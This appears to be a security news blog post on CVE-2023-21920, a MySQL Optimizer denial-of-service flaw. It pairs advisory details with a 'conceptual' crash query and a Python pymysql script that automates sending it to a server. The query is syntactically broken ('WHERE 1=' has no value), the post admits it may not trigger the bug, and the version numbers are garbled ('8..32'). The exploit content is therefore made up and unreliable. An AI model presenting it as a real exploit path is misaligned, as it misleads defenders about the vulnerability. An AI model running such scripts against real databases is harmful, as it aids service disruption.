CVE CyberSecurity Database News

CVE-2023-21920 - MySQL Server Optimizer Vulnerability—How it Works, Exploit Details, and What You Need to Know

Poster -

In early 2023, Oracle published a significant security advisory for MySQL Server, identifying a vulnerability tracked as CVE-2023-21920. This flaw specifically affects the Optimizer component found in MySQL Server versions 8..32 and earlier. While not as severe as remote code execution bugs, CVE-2023-21920 still poses a real threat: it allows someone with high-privilege access and network connectivity to crash the MySQL service, resulting in a Denial of Service (DoS) that could knock your database out of action.

This post breaks down what CVE-2023-21920 is, how attackers can exploit it, and what you can do to protect your MySQL servers. We’ll keep the language jargon-free and provide relevant code snippets for demo and testing.

Understanding the Vulnerability

Vulnerability type: Denial of Service (DoS)  
Affected product: Oracle MySQL Server (Optimizer component)  
Affected versions: MySQL 8..32 and earlier  
Exploitability: Easily exploitable, requires high-privilege user on MySQL  
Access: Network via multiple protocols  
Impact: Causes repeatable crash/hang of the MySQL Server  
CVSS 3.1 Base Score: 4.9 (Availability only)  
Oracle Advisory: Oracle Critical Patch Update Advisory - April 2023

In plain words: If an attacker has an account on your database with high privileges (like DBA), and they can connect over the network (with tools like MySQL Workbench, or mysql CLI), they can send specific SQL queries that crash the server every time.

How the Exploit Works

The flaw is located in the MySQL Optimizer, which is the component responsible for planning how SQL queries are executed. Under certain conditions, submitting crafted queries causes the optimizer to go into a state that it can't recover from, leading to a server crash or hang.

*Key requirement:* The attacker must already have high-privileged credentials (e.g. DBA, ADMIN, or SUPER permissions).

Example of Exploit Path

Let’s look at a conceptual example (note: specific details may not be released by Oracle for public security, but security researchers often find crash paths by fuzzing):

-- Simple example of a crafted SELECT statement that may trigger the bug
SELECT /*+ MAX_EXECUTION_TIME(1) */ col1 
FROM (
  SELECT col1 
  FROM test_table
  UNION ALL
  SELECT col1
  FROM test_table
  WHERE 1=
) AS sub
ORDER BY col1
LIMIT 5 OFFSET 1;

*Note*: DO NOT RUN unverified PoC queries on production servers. Use an isolated test environment only!

The crash might not come from this exact snippet (the actual exploit depends on the bug specifics), but reports suggest that unusual subqueries combined with specific optimizer hints, or abuse of certain expression types, can trigger the flaw.

MySQL server processes the query:

The optimizer gets confused/trapped in error handling, causing the server to hang or crash.

Code Demonstration: MySQL Crash Simulation

Here’s a mockup script to show how someone might attempt to automate the attack, using Python and pymysql:

import pymysql

connection = pymysql.connect(
    host='target.mysql.server',
    user='admin_user',   # Needs high privileges
    password='admin_pass',
    database='test_db'
)

try:
    with connection.cursor() as cursor:
        # Insert crafted malicious query here
        crash_query = """
        SELECT /*+ MAX_EXECUTION_TIME(1) */ col1 
        FROM (
          SELECT col1 
          FROM test_table
          UNION ALL
          SELECT col1
          FROM test_table
          WHERE 1=
        ) AS sub
        ORDER BY col1
        LIMIT 5 OFFSET 1;
        """
        cursor.execute(crash_query)
        result = cursor.fetchall()
        print(result)
except Exception as e:
    print("Exception encountered:", e)
finally:
    connection.close()

*Use this only in a controlled lab! Replacing crash_query with actual exploit code would cause the server to become unavailable.*

MySQL server stops responding; all applications relying on it lose access to their data.

- If inside cloud applications/on-demand services, customers may require manual or automated intervention (service restart).

Upgrade to Oracle MySQL 8..33 or later, which resolves this issue.

Get updates here

References

- Oracle CPU Advisory - April 2023
- NVD CVE-2023-21920
- MySQL Security Updates

Conclusion

CVE-2023-21920 is a solid reminder that even with strong authentication, bugs in critical components like the MySQL Optimizer can knock out entire databases. The best defense is to patch quickly, limit administrative access, and follow good security practices. While this is *not* a remote unauthenticated exploit, the impact on availability is real and repeatable—so don’t ignore those update notifications!

Timeline

Published on: 04/18/2023 20:15:00 UTC
Last modified on: 04/27/2023 15:15:00 UTC